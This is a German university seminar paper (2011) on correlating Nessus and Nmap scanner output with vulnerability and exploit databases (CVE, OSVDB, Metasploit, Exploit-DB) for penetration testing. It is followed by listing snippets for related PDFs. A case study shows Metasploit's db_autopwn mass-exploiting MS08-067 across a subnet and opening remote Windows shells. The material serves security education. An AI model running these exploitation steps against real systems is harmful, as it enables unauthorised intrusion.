Netzwerkorientierte Anwendungssicherheit

Größe: px
Ab Seite anzeigen:

Download "Netzwerkorientierte Anwendungssicherheit"

Transkript

1 Netzwerkorientierte Anwendungssicherheit Möglichkeiten der Korrelation von Schwachstelleninformationen von Vulnerability Scannern mit Exploit- und Schwachstellendatenbanken Betreuer: Helmut Kaufmann, Bernhard Thaler Verfasser: Wolfgang Reidlinger Stand: 22/02/2011 Seminararbeit / SS10 Matthias Corvinus-Straße 15, A-3100 St. Pölten, T: , F: , E: I:

2 Inhaltsverzeichnis 1 Abstract Vulnerability Scanner Vulnerability Information Portals Common Vulnerability and Exposures (CVE) Open Source Vulnerability Database (OSVDB) Output Vulnerability Scanner Schwachstellenidentifikationsnummern Nessus Output Vorhandene Angriffe / Funktionierender Exploitcode Metasploit Penetration Testing Framework Milw0rm Exploit-DB Packet Storm Wahl des Angriffswerkzeuges Metasploit Penetration Testing Framework Automatisiertes Exploiten mit Hilfe von Vulnerability od. Port Scanner Output Canvas Immunity Core Impact Pro Fallbeispiel Fazit /

3 1 Abstract Um ein fremdes Computersystemen erfolgreich unter seine Kontrolle bringen zu können sind folgende Arbeitsschritte zu erledigen. Zunächst müssen in der Information Gathering Phase so viel Informationen wie nur irgend möglich über das entsprechende Ziel gesammelt werden. Der nächste Arbeitsschritt befasst sich mit einer näheren Analyse der offenen bzw. gefilterten Ports am Zielsystem. Weiters kommen diverse Vulnerability Scanner, je nach Service welches am Ziel läuft, zum Einsatz. Je nach Qualität der eingesetzten Scanning Software liefert der Output detailliertere Informationen bezüglich eingesetztes Betriebssystem, verwendete Softwareversionen, angebotene Services und Hardware. Diese Informationen sind in einer späteren Phase möglicherweise noch von Bedeutung. Sollte der Vulnerability Scanner explizit, bereits veröffentlichte und bekannte Schwachstellen im Betriebssystem bzw. einem Service identifizieren so werden diese mittels der dafür vergebenen Schwachstellenidentifikationsnummer aufgelistet. Diese ID Nummern sind für den nächsten Schritt enorm wichtig, denn nun geht es daran die entsprechende Schwachstellen bzw. Exploitdatenbanken zu durchsuchen. Dieser Arbeitsschritt erfordert in der Regel den meisten Zeitaufwand. Um einen Penetration Test erfolgreich abschließen zu können muss zum Schluss noch ein adäquates Angriffstool ausgewählt und der Exploit angewendet werden. 2 Vulnerability Scanner Vulnerability Scanner sind Computerprogramme, die Zielsysteme auf bekannte Sicherheitslücken hin untersuchen. [1] Im Gegensatz zu Portscanner suchen Vulnerability Scanner nicht nur nach offenen Ports und der Versionsnummer der dahinter stehenden Services sondern überprüfen ein Zielsystem auf tatsächlich existierende Sicherheitslücken bzw. Schwachstellen. Die Informationen zu den Schwachstellen der Betriebssysteme und der angebotenen Dienste werden aus Datenbanken, welche die Vulnerability Scanner zur Verfügung stellen, bezogen. Eine hundertprozentige Treffergenauigkeit ist natürlich auf Grund der hohen Komplexität nicht zu erreichen. False Positive Erkennungen sind daher durchaus möglich. Ein Vulnerability Scanner ist logischerweise immer nur so gut wie das Datenmaterial welches ihm zur Verfügung steht. Aktuelle Schwachstellen können daher nur mit entsprechend aktuellen Signaturdatenbanken erkannt werden. Weist ein Zielsystem eine gravierende Schwachstelle auf die der zum Einsatz kommende Vulnerability Scanner jedoch noch nicht in seiner Datenbank aufweist, so wird er diese auch noch so gravierenden Sicherheitslücken nicht erkennen. Daher können Vulnerability Scanner nicht zur Detektion und Vermeidung von Zero-Day Exploits herangezogen werden, da sie nur Lücken erkennen welche bereits veröffentlicht und dokumentiert sind. Der Prozess des Vulnerability Scannings stellt jedoch einen wichtigen Bestandteil jedes technischen Sicherheitsaudits dar. Ein Vulnerability Scanner ist im Stande, die offenen Ports eines Systems zu ermitteln, indem sukzessive Anfragen an die verschiedenen Ports gesendet und die Antworten analysiert werden, um herauszufinden, welche aktiv sind. Durch eine sehr genaue Untersuchung der empfangenen TCP/IP Pakete sind moderne Sicherheitsscanner manchmal im Stande, das Betriebssystem der entfernten 3/

4 Maschine und die Versionen der zu den Ports gehörenden Anwendungen festzustellen, und, wenn nötig, wichtige Updates zu empfehlen, dies bezeichnet man als Versionscharakterisierung. [2] Hierfür werden spezielle Tools verwendet. Diese können kommerziell und teilweise extrem teuer sein, als Beispiel hierzu ist Core Impact 1 zu nennen. Kostenlose Open Source Produkte haben allerdings auch schon ihren fixen Platz am Markt eingenommen. Das populärste Open Source Produkt ist mit Sicherheit Nessus 2 von Tenable. Bei Nessus kann man sich entweder für den kostenlosen HomeFeed oder den kostenpflichtigen ProfessionalFeed entscheiden. Der ProfessionFeed bieten den Vorteil, dass man aktuell erscheinende Schwachstellensignaturen sofort bei Scans verwenden kann. Der HomeFeed bietet grundsätzlich die gleiche Funktionalität jedoch sind neue Schwachstellensignaturen erst mit einer gewissen Zeitverzögerung verfügbar. Gute Vulnerability Scanner liefern nicht nur die erkannten Dienstnamen und Versionsinformationen zum entsprechend gefundenen Service, sondern auch eine konkrete Schwachstellenidentifikationsnummer wie zum Beispiel MSxx-xxx, CVE ID, Bugtraq, ISS X-Force ID, Metasploit ID, oder BID. Auf die Schwachstellenidentifikatsnummern wird etwas später eingegangen. Der bekannte IT-Sicherheitsspezialist und Autor des Nmap Security Scanner, Gordon Lyon alias Fyodor 3 hat auf seiner Website eine Liste der Top 100 Vulnerability Scanner 4 veröffentlicht. Diese Liste kam durch eine Umfrage zustande, welche über die nmap-hackers 5 Mailing Liste abgehandelt wurde. Eine auf Websites und Webapplications spezialisierte Untergruppe der Vulnerability Scanner bilden die so genannten Web Vulnerability Scanner. Hierzu hat Fyodor eine Top 10 Liste 6 erstellt. Diese Scanner konzentrieren sich ausschließlich auf das Testen der Sicherheit von Websites und Webapplikationen RSS Feed zur Mailing Liste: 6 4/

5 3 Vulnerability Information Portals 3.1 Common Vulnerability and Exposures (CVE) Alle veröffentlichten Schwachstellen bekommen eine eindeutige Identifikationsnummer zugewiesen. Das wohl bekannteste Kennzeichnungssystem, Common Vulnerability and Exposures (CVE), wurde vom National Institute of Standards and Technology (NIST) 7 ins Leben gerufen. CVE ist ein entstehender Industriestandard, dessen Ziel die Einführung einer einheitlichen Namenskonvention für Sicherheitslücken und andere Schwachstellen in Computersystemen ist. Mehrfachbenennung gleicher Gefahren durch verschiedene Unternehmen und Institutionen werden um eine laufende Nummer (zb. CVE ) ergänzt, um eine eindeutige Identifizierung der Schwachstelle zu gewährleisten. Dadurch ist ein reibungloser Informationsaustausch zwischen den verschiedenen Datenbanken einzelner Hersteller möglich. [3] Das NIST bietet online eine CVE Vulnerability Database Suche 8 an. Die MITRE Corporation 9, eine 1958 gegründete U.S.-amerikanische Denkfabrik und Non-Profit- Organisation, betreibt in Zusammenarbeit mit bekannten Sicherheitsexperten, Regierungsorganisationen und Anti-Virus Software Herstellern gemeinsam die CVE Datenbank Open Source Vulnerability Database (OSVDB) Wie schon erwähnt wäre ein einheitliches Kennzeichnungssystem erstrebenswert, dieses ist jedoch nur sehr schwer in der Praxis durchführbar und benötigt vor allem sehr lange Umsetzungszeiten. Die Open Source Vulnerability Database (OSVDB), eine kostenlose Open Source Plattform bietet jedoch die Möglichkeit verschiedene Kennzeichnungssysteme miteinander zu verknüpfen. Das Projekt wurde 2002 im Zuge der Blackhat und DEFCON durch Zusammenarbeit mehrerer IT-Sicherheitsexperten, darunter H.D. Moore 11 (Metasploit Framework 12 Gründer), ins Leben gerufen. Die Plattform wird, ähnlich wie bei der Wikipedia Foundation, durch die Informationen der Online Community vergrößert und aktualisiert. Wenn man zb. nach der Microsoft Schwachstelle MS08-067, auf die der Conficker Wurm aufsetzt, sucht bekommt man eine Liste welche Kennzeichnungssysteme noch auf diese Lücke referenzieren /

6 Abbildung 1: Auszug Output OSVDB Quelle: Außerdem wird in den meisten Fällen eine Korrelation mit populären Exploit Datenbanken wie ExploitDB 13, Metasploit Framework 14 oder Milw0rm 15 hergestellt. Weiters finden sich Links zu Advisories diverser Softwarehersteller und IT-Sicherheitsfirmen. Abbildung 2: Auszug Output OSVDB Quelle: Sollte die Erkennung dieser Schwachstelle bereits in Erkennungstools wie Snort 16 oder Nessus 17 implementiert sein, so findet man ebenfalls die entsprechenden Hersteller eigenen Identifikationsnummern inklusive Link zum passenden Plugin (Nessus). Oben beschriebene Informationen sind durchaus sehr hilfreich und unerlässlich für IT- Sicherheitsfachleute. Um jedoch eine korrekte Risikobewertung bzw. Einstufung der Schwachstelle für das eigene Unternehmen bzw. Organisation zu treffen ist ein Scoring System erforderlich. Die OSVDB verwendet hierfür das Common Vulnerability Scoring System (CVSS) in der Version 2. Abbildung 3: Auszug Output OSVDB Quelle: Vorschlag, der wenig 17 6/

7 Sollte man mit dieser Bewertung nicht übereinstimmen so gibt es auch die Möglichkeit seine Meinung einfließen zu lassen. Im oben stehenden Auszug sieht man, dass es sich hier um eine ziemlich massive Schwachstelle handelt (immer noch MS08-067). Es handelt es sich um einen Industriestandard welcher die Klassifizierung von Schwachstellen in Computer Systemen ermöglicht. Für die Bewertung wird eine Metrik verwendet, welche sich in drei Gruppen einteilen lässt. Abbildung 4: CVSS tree metric groups Quelle: In den drei Hauptgruppen sind Merkmale wie Vertraulichkeit, Integrität und Verfügbarkeit enthalten. Weiters werden noch folgenden Kriterien bewertet: Angriffsvektor Schwachstelle nur lokal oder über das Netzwerk ausnutzbar Authentifizierung notwendig Verfügbarkeit von Exploits Angriff nur theoretisch Exploit bei Veröffentlichung der Schwachstelle noch nicht bekannt Offizieller Patch / Workaround veröffentlicht uvm. Sollte man mit der Einstufung nicht übereinstimmen, kann man die Kalkulation selbstständig durchführen. Security-Database 18 bietet online einen CVSSv2 Calculator 19 an. National Vulnerability Database stellt ebenfalls einen CVSSv1 20 und CVSSv2 21 Calculator zur Verfügung /

8 4 Output Vulnerability Scanner Oben wurde bereits erwähnt, dass ein standardisiertes Schwachstellen-ID System viele Vorteile und Arbeitsersparnis mit sich bringt. Deswegen ersuchen die diversen Schwachstellenscanner ebenfalls diese Schwachstellen-IDs als Output ihrer Scanergebnisse zu liefern. Gibt es mehrere offizielle Schwachstellen-IDs für ein und die selbe Schwachstelle von verschiedenen Unternehmen so ist es möglich, dass mehrere IDs ausgegeben werden, sofern dies der Hersteller des Schwachstellenscanners implementiert hat. Bei Nessus ist dies bereits Standardverhalten. Dieser gelieferte Output kann dann in den diversen Datenbanken eingegeben und nach weiterführenden Information gesucht werden. 4.1 Schwachstellenidentifikationsnummern Folgende angeführte Schwachstellenidentifikationsnummersysteme werden von den unterschiedlichen Herstellern bzw. offiziellen Stellen verwendet. Dies ist lediglich eine Aufzählung und keinesfalls vollständig. CVE 22 Bugtraq 23 Secunia Advisory 24 SCIP VulDB 25 ISS X-Force 26 Metasploit 27 Exploit Database 28 Milw0rm 29 CERT VU /

9 VUPEN Advisory 31 MS Bulletin 32 Nessus 33 Snort Nessus Output Nessus liefert in der Regel zu einer gefundenen Schachstelle gleich mehrere unterschiedliche Schwachstellenidentifikations IDs auf. Vorwiegend jedoch folgende: CVE BID OSVDB MSxx-yyy (wenn es sich im eine Mircrosoft Bulletin handelt) Die Bewertung der Schachstelle wird mittels dem CVSS durchgeführt. Der Output für eine gefundene Schwachstelle sieht meist folgendermaßen aus. Ganz oben wird die Nessus Plugin ID, Plugin Name, Port und Severity angegeben. Weiters folgen einige beschreibende Worte und anschließende werden die bereits von mir erwähnten Kennzeichnungssystem ID angegeben. Abbildung 5: Nessus Output Plugin ID: Synopsis The remote name resolver (or the server it uses upstream) may be vulnerable to DNS cache poisoning. Description The remote DNS resolver does not use random ports when making queries to third party DNS servers. This problem might be exploited by an attacker to poison the remote DNS server more easily, and therefore divert legitimate traffic to arbitrary sites. Solution Contact your DNS server vendor for a patch See Also CVSS 9.4 (CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:C) https://forums.snort.org/forums/snort-org-discussion/topics/sid-rule-search-on-the-new-site 9/

10 Plugin Output The ports used by ***.***.***.*** are not random. An attacker may spoof DNS responses. List of used ports : CVE CVE BID Xref OSVDB:48186 OSVDB:47510 OSVDB:46837 OSVDB:46786 OSVDB:46776 OSVDB:46777 Eine Bewertung, welches Kennzeichnungssystem nun das beste ist, fällt nicht leicht. Mir persönlich gefällt natürlich das OSVDB System sehr gut. Denn man erhält auf dieser Plattform enorm viele weiterführende Informationen und bekommt weiters einen Überblick, welche IDs andere Plattformen bzw. Hersteller vergeben haben. Führt man Nessus Scans über große IP Bereiche durch, entsteht eine Unmenge an Output. Jedoch fehlt meist die Zeit sich diese Daten in Ruhe anzusehen und die wirklich gravierenden Schachstellen auf den entsprechenden Systemen herauszufiltern. Eine Möglichkeit diesen Arbeitsaufwand zu verkleinern bietet jene Methode, bei den mittels Perl Skripte der Output eines Nessus Scans geparst wird und entsprechend aufbereitet zb. an eine Datenbank weitergegeben wird. Nützliche Anleitungen hierfür findet sich unter anderem auf folgenden Webseiten: Parse::Nessus::NBE - use to extract specific data from Nessus NBE files 35 Enterprise Linux Tips:Managing Nessus reports 36 SplunkAdministration: Nessus NBE Output Parsing 37 Weiters bietet das neue Nessus Security Center Version (Build 9119) die Möglichkeit bestimmte Filter auf erstellte Reports anzuwenden. Welche Filter verfügbar sind, wird im unten stehenden Bild ersichtlich ShortReg=1&mboxConv=searchEnterpriseLinux_RegActivate_Submit& /

11 Abbildung 6: Nessus Reporting Filters Diese Filter Möglichkeit bieten natürlich nur sehr grobe Vergleichsmöglichkeiten an. Jedoch ist eine primäre Filterung nach dem Schweregrad ( Severity) der Schwachstelle durchaus sehr brauchbar. 5 Vorhandene Angriffe / Funktionierender Exploitcode Im nun folgenden gilt es zu einer identifizierten Schwachstelle einen bereits publizierten Angriff zu finden. Dieser Angriff kann zb. nun theoretisch vorhanden sein. In der Regel möchte man jedoch einen Proof of Concet Angriff, dh. man benötigt einen funktionierenden Programmcode welcher als Exploit verwendet werden kann. Dieser kann in den unterschiedlichsten Programm- bzw. Skriptsprachen oder bereits als fertiges Programm vorliegen. 5.1 Metasploit Penetration Testing Framework Handelt es sich um eine Sicherheitslücke unter Windows mit entsprechender Microsoft Bulletin ID, so würde ich als primäre Instanz das Framework des H.D. Moore und seinen Helfern zu Rate ziehen. Hier kann man sowohl den Sourcecode zu den jeweiligen Exploits einsehen als auch funktionierende Exploitmodule beziehen. Das Metasploit Penetration Testing Framework stellt eine Datenbanksuche 38 auf ihrer Website zur Verfügung. Mit einer entsprechenden Schwachstellen-ID bietet sich somit die Möglichkeit im Metasploit Framework nach bereits implementierten Exploitmodulen zu suchen. Wie man im unten stehenden Screenshot stehen kann, werden für die Datenbanksuche eine Reihe von gängigen Schwachstellen-ID Systeme unterstützt. Abbildung 7: Metasploit DB Suche Quelle: /

12 Sucht man nun nach der bereits oben verwendeten Microsoft Schwachstelle MS bekommt man alle Informationen, welche zur Exploration eines entsprechenden ungepatchten Zielsystem notwendig sind. Weiters kann man sich auch den Sourcecode 39 des Exploitmodules im Metasploit Framework ansehen außerdem werden alle Optionen des Modules beschrieben und man bekommt auch ähnliche Exploitmodule angezeigt. Interessant ist auch die kurze Beschreibung zum Hintergrund der Schwachstelle und Kontaktinformationen zum Autor des Exploitmodules. Hilfreich ist auch der Rank des Modules, dieser gibt an wie gut bzw. zuverlässig das Modul funktioniert, welcher basierend auf Userfeedback erstellt wird. Sollte man trotz der sehr ausführlichen Anleitung noch Probleme bei der Anwendung des Metasploit Penetration Testing Framework haben dem sei die Online Training Plattform von Offensive Security Metasploit Unleashed 40 ans Herz gelegt. 5.2 Milw0rm Milw0rm stellt eine der am längsten bestehenden, frei zugänglichen Exploitcodedatenbanken dar. Der zukünftige Fortbestand der Plattform ist momentan jedoch etwas fraglich, da die hauptverantwortliche Person aufgrund von Zeitmangel ihre Arbeitstätigkeit für die Plattform vorübergehend eingestellt hat 41. Die Seite ist mittlerweile wieder online, wer sie nun betreibt liegt jedoch im Dunkeln. Basierend auf den Informationen, welche uns der Vulnerability Scanner über die entsprechende Version des getesteten Services liefert, bietet Milw0rm die Möglichkeit gezielt nach funktionierenden Exploitcode zu suchen. Milw0rm bietet ebenfalls eine komfortable Datenbankensuche an. Wir bekommen folgendes Ergebnis wenn wir auch hier nach der bereits oben verwendeten Microsoft Schwachstelle MS suchen: Abbildung 8: Milw0rm Datenbanksuche Quelle: Die gefundenen Ergebnisse werden sortiert nach Kategorie ausgegeben. Oben ist sehr schön ersichtlich, dass es mehrfach Exploit bzw. Shellcode und sogar ein interessantes Paper zu dieser Microsoft Schwachstelle in der Milw0rm Datenbanken zu finden gibt /

13 Das universell passende Angriffstool für die veröffentlichten Exploits gibt es jedoch auf dieser Plattform nicht. In der Regel handelt es sich um Quellcodes in den unterschiedlichsten Programmier- bzw. Skriptsprachen, diese beinhalten unter anderem C, C++ und Python. Milw0rm bietet weiters die Möglichkeit zum Downloaden seiner Datenbank 42, damit kann auch offline nach Exploits gesucht werden. 5.3 Exploit-DB Mit der Exploit-DB 43 ist es dem Unternehmen Offensive Security gelungen eine zentrale Sammelstelle für veröffentlichte Exploits zu schaffen. Derzeit beinhaltet die Datenbank etwas über Exploits. Wie auch Milw0rm bietet auch Exploit-DB ihre Datenbank zum Downloaden 44 an. Eine Datenbanksuche 45 nach der bereits oben mehrmals verwendeten Microsoft Schwachstelle MS ergab folgendes Ergebnis. Abbildung 9: Exploit-DB Suche Quelle: Abbildung 10: Exploit-DB Suche Quelle: Die Ausgabe ist relativ selbsterklärend. Die Spalten D,A und V haben folgende angeführte Bedeutungen. D steht für Download des Exploits, A steht für Applikation hier könnte man direkt die verwundbare Applikation downloaden und V steht dafür, ob der Exploitcode von Seiten der Datenbankbetreuer verifiziert bzw. auf Funktion überprüft wurde. Es wird auch eine Firefox Add-on 46 zur Datenbanksuche angeboten https://addons.mozilla.org/de/firefox/addon/ /

14 5.4 Packet Storm Packet Storm stellt ebenfalls eine Exploitdatenbank, welche jedoch auch Advisories, Papers, und Abwehstrategien (OS Hardening) für alle großen Betriebssysteme zur Verfügung. Außerdem verfügt die Plattform über global verteilte Mirrors. Dies garantiert eine nahezu hundertprozentige Verfügbarkeit dieses Portals. Eine Liste der Mirrors ist im unten stehenden Bild ersichtlich. Abbildung 11: Packet Storm Security List of Mirrors 6 Wahl des Angriffswerkzeuges Nun sind wir bei einem Punkt angelangt an dem wir eine Schwachstelle im Betriebssystem lokalisiert haben und uns der entsprechend passende Exploitcode bekannt ist. Was nun fehlt ist ein passendes Angriffswerkzeug. Die Wahl des Tools wird natürlich von der Art der Schwachstelle beeinflusst. Zuerst muss unterschieden werden, ob es sich um einen Serverseitigen Exploit oder einen Lokalen Exploit handelt. Es ist auch möglich, dass für ein erfolgreiches exploiten einer Applikation überhaupt kein Tool erforderlich ist, sondern lediglich die Eingabe entsprechender Codes zb: in eine Shell, ein Eingabefeld oder Adressleiste. Handelt es sich um einen Serverseitigen bzw. Lokalen Exploit für ein Windows Betriebssystem so ist das Open Source Tool der Wahl höchstwahrscheinlich Metasploit, welches fertig installiert in der Linux Distribution Backtrack vorliegt bzw. als Installationsdatei für alle gängigen Betriebssysteme zum freien Download zur Verfügung steht. 6.1 Metasploit Penetration Testing Framework Dieses universelle Angriffstool bietet eine Vielzahl an unschlagbaren Vorteilen. Die Zeitfenster in denen die Entwickler, nach bekannt werden einer Windows Schwachstelle, passende Exploitmodule für das Framework schreiben, sind in der Regel relativ kurz. Die Exploits lassen sich meist auf das entsprechende Zielsystem anpassen, denn es gibt hier Unterschiede zwischen den einzelnen Sprachversionen der Windows Systeme. (Die entsprechende Sprachversion des Zielsystems sollte schon durch den Vulnerability Scanner oder sonstige OS-Fingerprinting Methoden im Vorfeld ermittelt worden sein.) Ein weiterer großer Vorteil ist die Tatsache, dass man sich den Payload, sprich jener Programmcode der eingeschleust und ausgeführt wird, beliebig aussuchen kann. Jedoch gibt es keine Garantie, dass jeder Payload mit jeden Exploit funktioniert. Als abschließender Pluspunkt sei der Umstand, dass es sich hier um eine komplett freie Software handelt, herauszustreichen. 14/

15 6.1.1 Automatisiertes Exploiten mit Hilfe von Vulnerability od. Port Scanner Output Metasploit bietet die großartige Möglichkeit Exploitversuche aufgrund von Information, welches aus Outputfiles von Nmap, Nessus oder OpenVas, durchzuführen. Hierzu ist lediglich die Kenntnis der entsprechenden Kommandos und Vorgehensweisen notwendig. Nachdem das Aufsetzen und Konfigurieren der entsprechenden Datenbank und das Zusammenspiel mit Metasploit erledigt ist können mit folgenden Befehlen direkt Nessus bzw. Nmap Outputfiles in die Metasploit Datenbank importiert werden. msf > db_import_nessus_nbe [PFAD] msf > db_import_nmap_xml [PFAD] Durchgeführt wird die automatisierte Exploration mittels folgenden Befehls. Es kann angegeben werde welche Information als Auswahlkriterium zur Exploitverwendung herangezogen werden. Hierbei gibt es zwei grundlegende Ansätze, zum einen portbasierend und zum anderen basierend auf Vulnerability Informationen. msf > db_autopwn [*] Usage: db_autopwn [options] h Display this help text t Show all matching exploit modules x Select modules based on vulnerability references p Select modules based on open ports e Launch exploits against all matched targets r Use a reverse connect shell b Use a bind shell on a random port (default) q Disable exploit module output R [rank] Only run modules with a minimal rank I [range] Only exploit hosts inside this range X [range] Always exclude hosts inside this range PI [range] Only exploit hosts with these ports open PX [range] Always exclude hosts with these ports open m [regex] Only run modules whose name matches the regex T [secs] Maximum runtime for any exploit in seconds Jedoch sollte man sehr genau wissen, welche Ziele sich in diesen Outputfiles befinden, denn Metasploit greift jedes angegebene Ziel ohne Rücksicht an. Auch im unten stehenden Blogeintrag wird explizit darauf hingewiesen: Until this change occurs, be really careful about what data you feed to the framework. Do NOT import anything into the database that you are not allowed to exploit. [4] Umfangreiche Information zur Metasploit 3.0 Automated Exploitation finden sich im entsprechenden Blogeintrag 47 des Metasploit Portals /

16 6.2 Canvas Immunity Dieses Framework wird von der Firma ImmunitySec 48 entwickelt und vertrieben. Derzeit sind über 370 Exploits vorhanden und im Schnitt werden pro Monat vier neue Exploits veröffentlicht. Das Framework ist nicht kostenlos, dafür erhält man dann auch Service und Hilfestellung direkt vom Entwicklerteam per oder Telefon. vgl. [5] 6.3 Core Impact Pro Die Firma Core Security 49 vertreibt ein durchaus sehr brauchbares und mitunter extrem einfach zu bedienendes Exploiting Framework. Technischer Support und Benutzerfreundlichkeit haben jedoch einen stolzen Preis /

17 7 Fallbeispiel Um die Vorgehensweise näher zu veranschaulichen möchte ich eine kurzes Fallbeispiel zeigen. In diesem Fall möchten wir explizit nach der Microsoft Schachstelle MS suchen und wenn vorhanden auch automatisiert exploiten. Zu Beginn wird eine Nmap Scann über den IP-Bereich /24 durchgeführt. rw]# nmap p445 PN ss oa windows.445 script=smb check vulns.nse /24 rw]# ls la windows.445.* rw r r. 1 root root Apr 11:58 windows.445.gnmap rw r r. 1 root root Apr 11:58 windows.445.nmap rw r r. 1 root root Apr 11:58 windows.445.xml Anschließend sehen wir nach, ob die Metasploit Datenbank einen Exploit für diese Vulnerability enthält. Dies können wir entweder im Web über eine Datenbankabfrage oder über mittels eines grep in der Metasploitkonsole erledigen. Es kann auch alternativ die OSVDB durchsucht werden. rw]# msfcli grep ms08_067 [*] Please wait while we load the module tree... exploit/windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption Nun wissen wir, dass Metasploit entsprechende Exploitmodule für dieses Microsoft Bulletin bereitstellt. Nun wollen wir die von Nmap erfassten Daten in unsere Metasploit Datenbank importieren und einen automatischen Exploitvorgang starten. (Die Konfiguration der Datenbank usw. wurde in diesen Beispiel weggelassen) rw]# msf> db_import_nmap_xml /home/rw/windows.445.xml # Optionen anzeigen lassen: rw]# msf > db_autopwn [*] Usage: db_autopwn [options] h Display this help text t Show all matching exploit modules x Select modules based on vulnerability references p Select modules based on open ports e Launch exploits against all matched targets r Use a reverse connect shell b Use a bind shell on a random port (default) q Disable exploit module output R [rank] Only run modules with a minimal rank I [range] Only exploit hosts inside this range X [range] Always exclude hosts inside this range PI [range] Only exploit hosts with these ports open PX [range] Always exclude hosts with these ports open m [regex] Only run modules whose name matches the regex T [secs] Maximum runtime for any exploit in seconds rw]# msf> db_autopwn p e Sollte der Exploit auf irgendeinen der ausgewählt Ziele erfolgreich gewesen sein, so kann man sich mit folgenden Kommando die Liste der eröffneten Sessions ansehen und anschließend in eine entsprechend ausgewählt Session einsteigen. #Sessions anzeigen lassen: rw]# msf> sessions l Active sessions 17/

18 =============== Id Description Tunnel 1 Command shell :46858 > : Command shell :42700 > : Command shell :40966 > :27915 #Session zur Verwendung auswählen: rw]# msf> sessions i 1 [*] Starting interaction with 1... Microsoft Windows 2000 [Version ] (C) Copyright Microsoft Corp. C:\WINNT\system32> 8 Fazit Die am Markt befindlichen Vulnerability Scanner liefern durchgehend sehr brauchbare Informationen. Die Suche nach einem funktionierenden Exploitcode und die Wahl des passenden Angriffstools gestalten sich jedoch meist mühsam. Auf Seiten des Angreifers kommt es daher zu einem entsprechend hohen Zeitaufwand. Für Blackhats (kriminelle, bösartige Angreifer) spielt dies jedoch meist keine große Rolle. Soll man jedoch als IT-Sicherheitsunternehmen ein Sicherheitsaudit für einen Kunden durchführen, so muss dies mit einem vertretbaren Zeit- und Personalaufwand durchgeführt werden. Jedoch muss man zwischen kommerziellen Produkten wie Core Impact bzw. Canvas Immunity und Open Source Projekten wie Metasploit Penetration Framework unterscheiden. Die kommerzielle Schiene bietet meist eine Komplettlösung, sprich Vulnerability Scanner und Exploiting Plattform. Bei der Open Source Variante sind dies meist zwei getrennte Elemente, wobei der Trend auch in Richtung kombinierte Lösung geht. Die Spitzenprodukte der Open Source Welt sind jedoch ohne Frage Nessus, mit dem gratis Home Feed, und das Metasploit Framework. 18/

19 Literaturverzeichnis 1 : Vulnerability Scanner, ( ) 2 : Funktionsweise eines Vulnerability Scanners, ( ) 3 : Common Vulnerabilities and Exposures, ( ) 4 : Metasploit 3.0 Automated Exploitation, ( ) 5 : ImmunitySec CANVAS, ( ) Abbildungsverzeichnis Abbildung 1: Auszug Output OSVDB Quelle: Abbildung 2: Auszug Output OSVDB Quelle: Abbildung 3: Auszug Output OSVDB Quelle: Abbildung 4: CVSS tree metric groups Quelle: Abbildung 5: Nessus Output Plugin ID: Abbildung 6: Nessus Reporting Filters Abbildung 7: Metasploit DB Suche Quelle: Abbildung 8: Milw0rm Datenbanksuche Quelle: Abbildung 9: Exploit-DB Suche Quelle: Abbildung 10: Exploit-DB Suche Quelle: Abbildung 11: Packet Storm Security List of Mirrors /

German Metasploit Framework Tutorial 16. August 2005 dav

German Metasploit Framework Tutorial 16. August 2005 dav German Metasploit Framework Tutorial 16. August 2005 dav Inhalt 1. Einleitung 2. Exploit Datenbank 2.1. Neue Exploits integrieren 3. Payload Datenbank 4. Konfiguration und Anwendungen eines Exploits 4.1.

Mehr

PCI Security Scan. Beweisen Sie Ihre Sicherheit! Ihre Vorteile auf einen Blick:

PCI Security Scan. Beweisen Sie Ihre Sicherheit! Ihre Vorteile auf einen Blick: Beweisen Sie Ihre Sicherheit! Unser Security Scan ist eine Sicherheitsmaßnahme, die sich auszahlt. Systeme ändern sich ständig. Selbst Spezialisten kennen nicht alle Schwachstellen im Detail. Der PCI Scan

Mehr

ANGRIFF. Metasploit Fixing the framework. All diese Automatismen helfen allerdings

ANGRIFF. Metasploit Fixing the framework. All diese Automatismen helfen allerdings ANGRIFF MICHAEL MESSNER Metasploit Fixing the framework Schwierigkeitsgrad: Die praktische Anwendung des Metasploit Exploiting Frameworks bietet enorme Möglichkeiten zur Vereinfachung eines Pentests. Dazu

Mehr

Überprüfung der Wirksamkeit der BSI-Konfigurationsempfehlungen für Windows 7

Überprüfung der Wirksamkeit der BSI-Konfigurationsempfehlungen für Windows 7 BSI-Veröffentlichungen zur Cyber-Sicherheit ANALYSEN Überprüfung der Wirksamkeit der BSI-Konfigurationsempfehlungen Auswirkungen der Konfiguration auf den Schutz gegen aktuelle Drive-by-Angriffe Zusammenfassung

Mehr

Vulnerability Scanning + Penetration Testing

Vulnerability Scanning + Penetration Testing Vulnerability Scanning + Penetration Testing Seminar IT-Sicherheit Felix Riemann felixriemann@student.uni-kassel.de 29. Januar 2011 Gliederung Vulnerability Scanning Was ist das? Scanner Demo: Nessus Penetration

Mehr

ANGRIFF. Metasploit. Exploiting Framework the basics

ANGRIFF. Metasploit. Exploiting Framework the basics ANGRIFF MICHAEL MESSNER Metasploit Exploiting Framework the basics Schwierigkeitsgrad: Vor allem im professionellen Pentesting Umfeld nehmen Exploiting Frameworks mittlerweile eine nicht mehr wegzudenkende

Mehr

MySQL Queries on "Nmap Results"

MySQL Queries on Nmap Results MySQL Queries on "Nmap Results" SQL Abfragen auf Nmap Ergebnisse Ivan Bütler 31. August 2009 Wer den Portscanner "NMAP" häufig benutzt weiss, dass die Auswertung von grossen Scans mit vielen C- oder sogar

Mehr

3 Analyse der Informationen und Auswertung von Schwachstellen

3 Analyse der Informationen und Auswertung von Schwachstellen 3 Analyse der Informationen und Auswertung von Schwachstellen Webquellen: http://www.packetstormsecurity.org http://www.2600.com http://www.theregister.co.uk/content/55/16725.html Nessus, ISS Scanner Empfehlenswerte

Mehr

Metasploit Framework Unleashed beyond Metasploit

Metasploit Framework Unleashed beyond Metasploit Metasploit Framework Unleashed beyond Metasploit

Mehr

Backtrack 5. Effektive Sicherheitstests selbst durchführen. Autor: Martin Schagerl. Letzte Änderung am 17.07.2012. Version 1.2

Backtrack 5. Effektive Sicherheitstests selbst durchführen. Autor: Martin Schagerl. Letzte Änderung am 17.07.2012. Version 1.2 Effektive Sicherheitstests selbst durchführen Autor: Martin Schagerl Letzte Änderung am 17.07.2012 Version 1.2 Lexon e.u., Inh. Martin Schagerl, Holzing 52, A 3252 Bergland T: +43 / 676 / 7119622, E: office@lexon.at,

Mehr

Reale Angriffsszenarien - Überblick

